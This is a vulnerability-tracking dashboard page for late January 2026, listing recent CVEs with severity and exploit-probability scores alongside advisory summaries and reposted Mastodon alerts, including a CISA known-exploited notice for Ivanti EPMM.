## Updated at UTC 2026-01-30T09:37:03.095811

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-0963 9.9 0.00% 2 0 2026-01-30T07:16:15.173000 An input neutralization vulnerability in the File Operations API Endpoint compon
CVE-2026-0805 8.2 0.00% 2 0 2026-01-30T07:16:14.917000 An input neutralization vulnerability in the Backup Configuration component of C
CVE-2026-24714 7.5 0.00% 2 0 2026-01-30T05:16:33.093000 Some end of service NETGEAR products provide "TelnetEnable" functionality, which
CVE-2025-69517 9.8 0.05% 2 0 2026-01-30T00:15:56.327000 An HTML injection vulnerability in Amidaware Inc Tactical RMM v1.3.1 and earlier
CVE-2026-1637 8.8 0.00% 2 0 2026-01-29T23:16:11.473000 A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element i
CVE-2026-25116 7.6 0.00% 2 0 2026-01-29T22:15:56.110000 Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and pri
CVE-2026-1340 9.8 0.00% 5 0 2026-01-29T22:15:53.313000 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2026-1281 9.8 0.00% 6 0 2026-01-29T22:15:53.140000 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2025-69516 8.8 0.00% 2 0 2026-01-29T22:15:52.577000 A Server-Side Template Injection (SSTI) vulnerability in the /reporting/template
CVE-2025-56005 9.8 0.41% 1 2 2026-01-29T21:30:26 An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 all
CVE-2025-71003 7.5 0.02% 2 0 2026-01-29T21:15:52.617000 An input validation vulnerability in the flow.arange() component of OneFlow v0.9
CVE-2026-22260 7.5 0.01% 1 0 2026-01-29T21:03:54.520000 Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and pri
CVE-2026-21962 10.0 0.04% 3 4 2026-01-29T21:00:30.780000 Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in pr
CVE-2026-22806 9.1 0.00% 2 0 2026-01-29T20:16:10.277000 vCluster Platform provides a Kubernetes platform for managing virtual clusters,
CVE-2025-69602 9.1 0.02% 2 0 2026-01-29T20:16:09.663000 A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, wher
CVE-2026-24061 9.8 24.86% 5 43 template 2026-01-29T19:16:19.890000 telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2026-22795 5.5 0.03% 1 0 2026-01-29T19:16:19.670000 Issue summary: An invalid or NULL pointer dereference can happen in an applicati
CVE-2026-1610 8.1 0.00% 2 0 2026-01-29T19:16:19.483000 A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this
CVE-2026-1453 9.8 0.00% 4 0 2026-01-29T19:16:18.987000 A missing authentication for critical function vulnerability in KiloView Encoder
CVE-2025-71007 7.5 0.02% 6 0 2026-01-29T19:16:18.393000 An input validation vulnerability in the oneflow.index_add component of OneFlow
CVE-2025-61726 7.5 0.01% 2 0 2026-01-29T19:16:16.243000 The net/url package does not set a limit on the number of query parameters in a
CVE-2025-14472 8.1 0.01% 2 0 2026-01-29T19:16:10.993000 Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub all
CVE-2025-13986 7.5 0.02% 2 0 2026-01-29T19:16:10.837000 Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal
CVE-2025-13982 8.1 0.01% 2 0 2026-01-29T19:16:10.530000 Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction
CVE-2026-24897 10.0 0.44% 1 0 2026-01-29T17:16:25.253000 Erugo is a self-hosted file-sharing platform. In versions up to and including 0.
CVE-2025-71000 7.5 0.02% 2 0 2026-01-29T17:16:22.587000 An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attacker
CVE-2025-70999 7.5 0.02% 2 0 2026-01-29T17:16:22.420000 A GPU device-ID validation flaw in the flow.cuda.get_device_capability() compone
CVE-2025-65891 7.5 0.02% 2 0 2026-01-29T17:16:20.240000 A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a
CVE-2025-65890 7.5 0.02% 2 0 2026-01-29T17:16:20.053000 A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial
CVE-2025-61731 7.8 0.01% 2 0 2026-01-29T17:16:19.917000 Building a malicious file with cmd/go can cause can cause a write to an attacker
CVE-2025-14975 8.1 0.01% 2 0 2026-01-29T17:16:15.460000 The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a p
CVE-2025-14840 7.5 0.02% 2 0 2026-01-29T17:16:15.243000 Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTT
CVE-2025-15467 9.8 0.12% 13 2 2026-01-29T16:31:35.700000 Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE
CVE-2025-40551 9.8 0.87% 9 0 2026-01-29T16:31:35.700000 SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri
CVE-2025-40554 9.8 0.03% 6 1 2026-01-29T16:31:35.700000 SolarWinds Web Help Desk was found to be susceptible to an authentication bypass
CVE-2025-40553 9.8 0.65% 6 0 2026-01-29T16:31:35.700000 SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri
CVE-2025-40552 9.8 0.05% 6 0 2026-01-29T16:31:35.700000 SolarWinds Web Help Desk was found to be susceptible to an authentication bypass
CVE-2025-69420 7.5 0.07% 2 0 2026-01-29T16:31:35.700000 Issue summary: A type confusion vulnerability exists in the TimeStamp Response v
CVE-2026-24868 7.5 0.04% 1 0 2026-01-29T16:31:35.700000 Mitigation bypass in the Privacy: Anti-Tracking component. This vulnerability af
CVE-2025-69418 4.0 0.02% 1 0 2026-01-29T16:31:35.700000 Issue summary: When using the low-level OCB API directly with AES-NI or<br>other
CVE-2025-68160 4.7 0.03% 1 0 2026-01-29T16:31:35.700000 Issue summary: Writing large, newline-free data into a BIO chain using the line-
CVE-2025-15469 5.5 0.01% 1 0 2026-01-29T16:31:35.700000 Issue summary: The 'openssl dgst' command-line tool silently truncates input dat
CVE-2025-15468 5.9 0.02% 1 0 2026-01-29T16:31:35.700000 Issue summary: If an application using the SSL_CIPHER_find() function in a QUIC
CVE-2025-66199 5.9 0.02% 1 0 2026-01-29T16:31:35.700000 Issue summary: A TLS 1.3 connection using certificate compression can be forced
CVE-2025-11187 6.1 0.02% 1 0 2026-01-29T16:31:35.700000 Issue summary: PBMAC1 parameters in PKCS#12 files are missing validation which c
CVE-2026-22796 5.3 0.07% 1 0 2026-01-29T16:31:35.700000 Issue summary: A type confusion vulnerability exists in the signature verificati
CVE-2025-69419 7.4 0.03% 1 0 2026-01-29T16:31:35.700000 Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously craft
CVE-2025-69421 0 0.03% 1 0 2026-01-29T16:31:35.700000 Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer de
CVE-2025-14988 0 0.04% 1 0 2026-01-29T16:31:35.700000 A security issue has been identified in ibaPDA that could allow unauthorized act
CVE-2026-24842 8.2 0.03% 1 0 2026-01-29T16:31:35.700000 node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7
CVE-2026-1280 7.5 0.04% 1 0 2026-01-29T16:31:35.700000 The Frontend File Manager Plugin for WordPress is vulnerable to unauthorized fil
CVE-2025-40536 8.1 0.24% 1 0 2026-01-29T16:31:35.700000 SolarWinds Web Help Desk was found to be susceptible to a security control bypas
CVE-2025-40537 7.5 0.02% 1 0 2026-01-29T16:31:35.700000 SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials
CVE-2026-24840 8.0 0.02% 1 0 2026-01-29T16:31:35.700000 Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior
CVE-2025-67645 8.8 0.04% 1 0 2026-01-29T16:31:35.700000 OpenEMR is a free and open source electronic health records and medical practice
CVE-2025-55292 8.2 0.01% 1 0 2026-01-29T16:31:35.700000 Meshtastic is an open source mesh networking solution. In the current Meshtastic
CVE-2026-24836 7.6 0.04% 1 0 2026-01-29T16:31:35.700000 DNN (formerly DotNetNuke) is an open-source web content management platform (CMS
CVE-2026-24833 7.6 0.04% 1 0 2026-01-29T16:31:35.700000 DNN (formerly DotNetNuke) is an open-source web content management platform (CMS
CVE-2026-24770 9.8 0.42% 1 0 2026-01-29T16:31:35.700000 RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versio
CVE-2026-24783 7.5 0.01% 1 0 2026-01-29T16:31:35.700000 soroban-fixed-point-math is a fixed-point math library for Soroban smart contact
CVE-2026-24778 8.8 0.04% 1 0 2026-01-29T16:31:35.700000 Ghost is an open source content management system. In Ghost versions 5.43.0 thro
CVE-2026-24736 9.1 0.06% 2 0 2026-01-29T16:31:35.700000 Squidex is an open source headless content management system and content managem
CVE-2026-24882 8.4 0.01% 1 0 2026-01-29T16:31:35.700000 In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon durin
CVE-2026-23593 7.5 0.03% 1 0 2026-01-29T16:31:35.700000 A vulnerability in the web-based management interface of HPE Aruba Networking Fa
CVE-2026-23881 7.7 0.04% 1 0 2026-01-29T16:31:35.700000 Kyverno is a policy engine designed for cloud native platform engineering teams.
CVE-2026-22258 7.5 0.04% 1 0 2026-01-29T16:31:35.700000 Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.1
CVE-2026-24831 7.5 0.04% 2 0 2026-01-29T16:31:35.700000 Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-te
CVE-2026-24874 9.1 0.03% 2 0 2026-01-29T16:31:35.700000 Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in t
CVE-2026-0648 7.8 0.01% 1 0 2026-01-29T16:31:35.700000 The vulnerability stems from an incorrect error-checking logic in the CreateCoun
CVE-2026-24873 7.8 0.01% 1 0 2026-01-29T16:31:35.700000 Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects l
CVE-2026-24872 9.8 0.04% 1 0 2026-01-29T16:31:35.700000 improper pointer arithmetic vulnerability in ProjectSkyfire SkyFire_548.This i
CVE-2026-24832 9.8 0.04% 1 0 2026-01-29T16:31:35.700000 Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affec
CVE-2025-65889 7.5 0.02% 4 0 2026-01-29T16:31:00.867000 A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows a
CVE-2025-65888 7.5 0.02% 4 0 2026-01-29T16:31:00.867000 A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allow
CVE-2025-65886 7.5 0.02% 4 0 2026-01-29T16:31:00.867000 A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Den
CVE-2026-1056 9.8 0.14% 3 1 2026-01-29T16:31:00.867000 The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file delet
CVE-2025-57283 7.8 0.11% 2 0 2026-01-29T16:31:00.867000 The Node.js package browserstack-local 1.5.8 contains a command injection vulner
CVE-2025-61140 9.8 0.02% 2 0 2026-01-29T16:31:00.867000 The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pol
CVE-2025-62514 8.3 0.00% 2 0 2026-01-29T16:31:00.867000 Parsec is a cloud-based application for cryptographically secure file sharing. I
CVE-2025-7714 7.5 0.00% 2 0 2026-01-29T16:31:00.867000 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2025-7713 7.5 0.00% 2 0 2026-01-29T16:31:00.867000 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site
CVE-2026-1616 7.5 0.00% 2 0 2026-01-29T16:31:00.867000 The $uri$args concatenation in nginx configuration file present in Open Security
CVE-2025-7016 8.0 0.05% 2 0 2026-01-29T16:31:00.867000 Improper Access Control vulnerability in Akın Software Computer Import Export In
CVE-2026-24856 7.8 0.02% 1 0 2026-01-29T16:31:00.867000 iccDEV provides a set of libraries and tools that allow for the interaction, man
CVE-2025-33217 7.8 0.01% 2 0 2026-01-29T16:31:00.867000 NVIDIA Display Driver for Windows contains a vulnerability where an attacker cou
CVE-2025-33218 7.8 0.01% 2 0 2026-01-29T16:31:00.867000 NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mod
CVE-2025-33219 7.8 0.01% 2 0 2026-01-29T16:31:00.867000 NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel mo
CVE-2025-46691 7.8 0.01% 1 0 2026-01-29T16:31:00.867000 Dell PremierColor Panel Driver, versions prior to 1.0.0.1 A01, contains an Impro
CVE-2025-68662 7.6 0.04% 1 0 2026-01-29T16:31:00.867000 Discourse is an open source discussion platform. In versions prior to 3.5.4, 202
CVE-2025-57795 9.9 0.23% 2 0 2026-01-29T16:31:00.867000 Explorance Blue versions prior to 8.14.13 contain an authenticated remote file d
CVE-2025-57794 9.1 0.26% 2 0 2026-01-29T16:31:00.867000 Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted f
CVE-2026-24772 8.9 0.02% 1 0 2026-01-29T16:31:00.867000 OpenProject is an open-source, web-based project management software. To enable
CVE-2025-33220 7.8 0.01% 1 0 2026-01-29T16:31:00.867000 NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where
CVE-2025-58150 8.8 0.01% 1 0 2026-01-29T16:31:00.867000 Shadow mode tracing code uses a set of per-CPU variables to avoid cumbersome par
CVE-2026-24858 9.8 3.33% 14 4 2026-01-29T13:16:51.047000 An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-2
CVE-2026-24428 8.8 0.04% 2 0 2026-01-29T13:02:04.990000 Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) c
CVE-2026-24429 9.8 0.06% 2 0 2026-01-29T13:01:22.300000 Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) s
CVE-2026-23830 10.0 0.15% 1 0 2026-01-29T03:43:44 ### Summary A sandbox escape vulnerability due to `AsyncFunction` not being isol
CVE-2026-24765 7.8 0.08% 2 0 2026-01-29T03:43:28 ### Overview A vulnerability has been discovered involving unsafe deserializati
CVE-2026-24747 8.8 0.02% 1 0 2026-01-29T03:42:53 ### Summary A vulnerability in PyTorch's `weights_only` unpickler allows an att
CVE-2026-22039 10.0 0.04% 1 0 2026-01-29T03:31:32 ### Summary A critical authorization boundary bypass in namespaced Kyverno Poli
CVE-2026-24838 9.1 0.04% 2 0 2026-01-28T21:34:04 Module title supports richtext which could include scripts that would execute in
CVE-2025-57792 10.0 0.13% 2 0 2026-01-28T21:31:21 Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability c
CVE-2025-57793 8.6 0.11% 2 0 2026-01-28T21:31:21 Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability c
CVE-2026-24430 7.5 0.04% 1 0 2026-01-28T20:16:51.880000 Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) d
CVE-2026-24436 9.8 0.03% 1 0 2026-01-28T19:57:17.200000 Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) d
CVE-2026-24440 8.8 0.04% 1 0 2026-01-28T19:20:05.660000 Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) a
CVE-2026-24837 7.7 0.04% 1 0 2026-01-28T16:34:17 A module friendly name could include scripts that will run during some module op
CVE-2026-24477 7.5 0.02% 1 0 2026-01-28T15:59:06.483000 AnythingLLM is an application that turns pieces of content into context that any
CVE-2026-21569 7.9 0.05% 2 0 2026-01-28T15:31:30 This High severity XXE (XML External Entity Injection) vulnerability was introdu
CVE-2026-0844 8.8 0.03% 1 0 2026-01-28T12:30:36 The Simple User Registration plugin for WordPress is vulnerable to privilege esc
CVE-2025-14386 8.8 0.11% 1 0 2026-01-28T12:30:35 The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrat
CVE-2026-0702 7.5 0.03% 1 0 2026-01-28T09:30:35 The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerabl
CVE-2025-59106 8.8 0.06% 1 0 2026-01-27T21:32:51 The binary serving the web server and executing basically all actions launched f
CVE-2025-21589 9.8 0.03% 2 0 2026-01-27T21:31:56 An Authentication Bypass Using an Alternate Path or Channel vulnerability in Jun
CVE-2026-24881 8.1 0.06% 1 0 2026-01-27T21:31:49 In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an
CVE-2025-33234 7.8 0.01% 2 0 2026-01-27T18:32:29 NVIDIA runx contains a vulnerability where an attacker could cause a code inject
CVE-2026-24875 7.8 0.01% 1 0 2026-01-27T18:32:28 Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affect
CVE-2026-24869 8.1 0.03% 1 0 2026-01-27T18:32:24 Use-after-free in the Layout: Scrolling and Overflow component. This vulnerabili
CVE-2026-21509 7.8 4.74% 10 3 2026-01-27T16:19:42.330000 Reliance on untrusted inputs in a security decision in Microsoft Office allows a
CVE-2026-1470 9.9 0.31% 5 1 2026-01-27T16:06:45.160000 n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflo
CVE-2025-52691 10.0 77.81% 1 11 template 2026-01-27T15:28:07.247000 Successful exploitation of the vulnerability could allow an unauthenticated atta
CVE-2026-21720 7.5 0.04% 1 0 2026-01-27T15:15:57.583000 Every uncached /avatar/:hash request spawns a goroutine that refreshes the Grava
CVE-2026-23864 7.5 0.60% 2 0 2026-01-27T14:59:34.073000 Multiple denial of service vulnerabilities exist in React Server Components, aff
CVE-2026-22709 9.8 0.06% 2 0 2026-01-27T14:59:34.073000 vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `P
CVE-2025-41727 7.8 0.02% 1 0 2026-01-27T14:59:34.073000 A local low privileged attacker can bypass the authentication of the Device Mana
CVE-2025-41726 8.8 0.18% 1 0 2026-01-27T14:59:34.073000 A low privileged remote attacker can execute arbitrary code by sending specially
CVE-2026-24828 7.5 0.04% 1 0 2026-01-27T14:59:34.073000 Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is
CVE-2026-24827 7.5 0.04% 1 0 2026-01-27T12:31:24 Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affec
CVE-2026-24830 9.8 0.04% 1 0 2026-01-27T12:31:24 Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects
CVE-2026-21721 8.1 0.03% 1 0 2026-01-27T09:30:36 The dashboard permissions API does not verify the target dashboard scope and onl
CVE-2026-24536 7.5 0.04% 1 0 2026-01-26T23:16:10.593000 Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne
CVE-2026-24524 8.1 0.03% 1 0 2026-01-26T23:16:09.643000 Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploi
CVE-2026-24523 7.5 0.04% 1 0 2026-01-26T23:16:09.460000 Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne
CVE-2026-24538 7.6 0.12% 1 0 2026-01-26T21:30:35 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-0863 8.5 0.06% 4 0 2026-01-26T15:05:39.840000 Using string formatting and exception handling, an attacker may bypass n8n's pyt
CVE-2026-0920 9.8 0.03% 2 3 2026-01-26T15:04:59.737000 The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Ad
CVE-2026-24002 9.0 0.06% 1 0 2026-01-26T15:04:59.737000 Grist is spreadsheet software using Python as its formula language. Grist offers
CVE-2025-15059 7.8 0.06% 1 0 2026-01-26T15:04:14.850000 GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi
CVE-2024-37079 9.8 79.02% 1 0 2026-01-26T14:52:05.833000 vCenter Server contains a heap-overflow vulnerability in the implementation of t
CVE-2026-24423 None 0.12% 2 1 2026-01-23T18:31:37 SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated
CVE-2024-9932 9.8 81.47% 1 3 2026-01-23T16:15:51.050000 The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads
CVE-2026-22794 9.6 0.03% 1 2 2026-01-21T19:14:17.880000 Appsmith is a platform to build admin panels, internal tools, and dashboards. Pr
CVE-2025-64328 0 0.46% 2 1 2025-11-12T16:20:22.257000 FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX
CVE-2025-12556 8.8 0.11% 2 0 2025-11-06T19:45:09.883000 An argument injection vulnerability exists in the affected product that could al
CVE-2025-34164 0 0.30% 1 0 2025-11-03T16:15:34.277000 A heap-based buffer overflow vulnerability in NetSupport Manager 14.x versions p
CVE-2025-8088 8.8 2.98% 7 27 2025-10-30T15:50:59.680000 A path traversal vulnerability affecting the Windows version of WinRAR allows th
CVE-2025-0282 9.0 94.11% 2 10 template 2025-10-24T13:54:58.783000 A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5,
CVE-2025-34165 0 0.25% 1 0 2025-09-02T15:55:35.520000 A stack-based buffer overflow vulnerability in NetSupport Manager 14.x versions
CVE-2025-2294 9.8 54.35% 1 9 template 2025-03-28T18:11:40.180000 The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclu
CVE-2022-48986 5.5 0.11% 1 0 2024-11-01T15:30:13.770000 In the Linux kernel, the following vulnerability has been resolved: mm/gup: fix
CVE-2026-2150 0 0.00% 1 3 N/A
CVE-2025-26385 0 0.00% 1 0 N/A
CVE-2026-24841 0 0.25% 1 0 N/A
CVE-2026-24741 0 0.07% 1 0 N/A
CVE-2026-22259 0 0.05% 1 0 N/A
CVE-2025-68670 0 0.17% 1 0 N/A

CVE-2026-0963
(9.9 CRITICAL)

EPSS: 0.00%

updated 2026-01-30T07:16:15.173000

2 posts

An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.

thehackerwire@mastodon.social at 2026-01-30T07:24:26.000Z ##

🔴 CVE-2026-0963 - Critical (9.9)

An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T07:24:26.000Z ##

🔴 CVE-2026-0963 - Critical (9.9)

An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0805
(8.2 HIGH)

EPSS: 0.00%

updated 2026-01-30T07:16:14.917000

2 posts

An input neutralization vulnerability in the Backup Configuration component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.

thehackerwire@mastodon.social at 2026-01-30T07:24:37.000Z ##

🟠 CVE-2026-0805 - High (8.2)

An input neutralization vulnerability in the Backup Configuration component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T07:24:37.000Z ##

🟠 CVE-2026-0805 - High (8.2)

An input neutralization vulnerability in the Backup Configuration component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24714
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-30T05:16:33.093000

2 posts

Some end of service NETGEAR products provide "TelnetEnable" functionality, which allows a magic packet to activate telnet service on the box.

thehackerwire@mastodon.social at 2026-01-30T05:59:55.000Z ##

🟠 CVE-2026-24714 - High (7.5)

Some end of service NETGEAR products provide "TelnetEnable" functionality, which allows a magic packet to activate telnet service on the box.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T05:59:55.000Z ##

🟠 CVE-2026-24714 - High (7.5)

Some end of service NETGEAR products provide "TelnetEnable" functionality, which allows a magic packet to activate telnet service on the box.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69517
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-01-30T00:15:56.327000

2 posts

An HTML injection vulnerability in Amidaware Inc Tactical RMM v1.3.1 and earlier allows authenticated users to inject arbitrary HTML content during the creation of a new agent via the POST /api/v3/newagent/ endpoint. The agent_id parameter accepts up to 255 characters and is improperly sanitized using DOMPurify.sanitize() with the html: true option enabled, which fails to adequately filter HTML in

thehackerwire@mastodon.social at 2026-01-29T17:02:29.000Z ##

🔴 CVE-2025-69517 - Critical (9.8)

An issue in Amidaware Inc Tactical RMM v1.3.1 and before allows a remote attacker to execute arbitrary code via the /api/tacticalrmm/apiv3/views.py component

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:29.000Z ##

🔴 CVE-2025-69517 - Critical (9.8)

An issue in Amidaware Inc Tactical RMM v1.3.1 and before allows a remote attacker to execute arbitrary code via the /api/tacticalrmm/apiv3/views.py component

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1637
(8.8 HIGH)

EPSS: 0.00%

updated 2026-01-29T23:16:11.473000

2 posts

A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element is the function fromAdvSetMacMtuWan of the file /goform/AdvSetMacMtuWan. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-01-29T23:52:08.000Z ##

🟠 CVE-2026-1637 - High (8.8)

A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element is the function fromAdvSetMacMtuWan of the file /goform/AdvSetMacMtuWan. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is pos...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T23:52:08.000Z ##

🟠 CVE-2026-1637 - High (8.8)

A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element is the function fromAdvSetMacMtuWan of the file /goform/AdvSetMacMtuWan. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is pos...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25116
(7.6 HIGH)

EPSS: 0.00%

updated 2026-01-29T22:15:56.110000

2 posts

Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and prior to version 4.7.2, an unauthenticated Path Traversal vulnerability in the `UserConfigController` allows any remote user to overwrite the system's `docker-compose.yml` configuration file. By exploiting insecure URN parsing, an attacker can replace the primary stack configuration with a malicious one, resulting in full

thehackerwire@mastodon.social at 2026-01-29T22:21:15.000Z ##

🟠 CVE-2026-25116 - High (7.6)

Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and prior to version 4.7.2, an unauthenticated Path Traversal vulnerability in the `UserConfigController` allows any remote user to overwrite the system's `docker-compose.yml...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T22:21:15.000Z ##

🟠 CVE-2026-25116 - High (7.6)

Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and prior to version 4.7.2, an unauthenticated Path Traversal vulnerability in the `UserConfigController` allows any remote user to overwrite the system's `docker-compose.yml...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1340
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-29T22:15:53.313000

5 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

secdb at 2026-01-30T00:00:21.113Z ##

🚨 [CISA-2026:0129] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-1281 (secdb.nttzen.cloud/cve/detail/)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti&#39;s guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please: see: forums.ivanti.com/s/article/Se ; support.mobileiron.com/mi/vsp/ ; support.mobileiron.com/mi/vsp/ ; nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-29T22:21:35.000Z ##

🔴 CVE-2026-1340 - Critical (9.8)

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

oversecurity@mastodon.social at 2026-01-29T22:20:07.000Z ##

Ivanti warns of two EPMM flaws exploited in zero-day attacks

Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...

🔗️ [Bleepingcomputer] link.is.it/teik2H

##

